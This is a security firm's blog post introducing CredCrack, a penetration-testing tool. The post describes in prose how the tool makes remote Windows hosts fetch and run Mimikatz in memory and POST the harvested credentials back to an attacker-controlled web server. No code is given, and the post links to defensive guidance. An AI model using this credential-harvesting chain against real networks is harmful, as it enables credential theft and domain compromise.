Posted by: Leap Security
Obtaining domain administrative privileges on a security assessment is a goal that many consultants desire. It is what fills us with excitement, as we know that the real fun is about to begin. After several assessments of crunching and spending time obtaining domain administrator privileges I decided I wanted to expedite this process.
CredCrack was born.
CredCrack was developed in python and made to be quick and quiet. It exfiltrates credentials in memory and in the clear while highlighting domain administrator accounts for you!
How it works
CredCrack begins by setting up the stage. It will automatically start the apache service and deploy two files to your /var/www directory. One is named fun.ps1 and another named creds.php. Additionally, the assessor running the script is responsible for downloading Invoke-Mimikatz.ps1 and storing it in the same directory (/var/www).
After it is done setting up, CredCrack will validate the list of systems provided to ensure it can reach them and that they have port 445 open. It will remove systems that can’t be reached and proceed to query systems for the list of domain administrators.
Once the list of domain administrators have been obtained, CredCrack will begin harvesting all systems for credentials. It will send an initial powershell command asking the remote system to connect back to the assessor’s system, download and execute the contents of fun.ps1 in memory.
The fun.ps1 powershell script will execute mimikatz in memory and send back the credentials to the assessor’s system in a POST request (which creds.php intercepts).
CredCrack will continue harvesting credentials for all systems provided then determine if any domain administrator credentials were obtained by matching each username with the list of domain administrators previously obtained. After that, CredCrack will output the results, gracefully clean up and quit.
Domain Administrator Credentials in 17 seconds
CredCrack has two main functionalities. CredCrack uses the provided local administrative user credentials to enumerate share privileges or harvest credentials across a network. to run. One reason to use the enumerate share functionality is to determine if the provided user has write or administrative access on a system. Refer to the syntax and example screenshot below for sample usage.
CredCrack’s most valuable functionality is its ability to harvest credentials. Refer to the syntax and example screenshot below for sample usage.
Awesome! It’s time to see CredCrack in action! The video below shows the use of CredCrack to obtain domain administrator credentials in 17 seconds.
CredCrack was made to faciliate obtaining domain administrator credentials on assessments. It has already helped us significantly on assessments and we hope it can help others as well. CredCrack does not have any dependencies other than Invoke-Mimikatz.ps1 if run on Kali Linux. For more information on CredCrack visit its Github page. For information on defending against CredCrack and similar attacks check out our blog post on defending against mass credential harvesting here.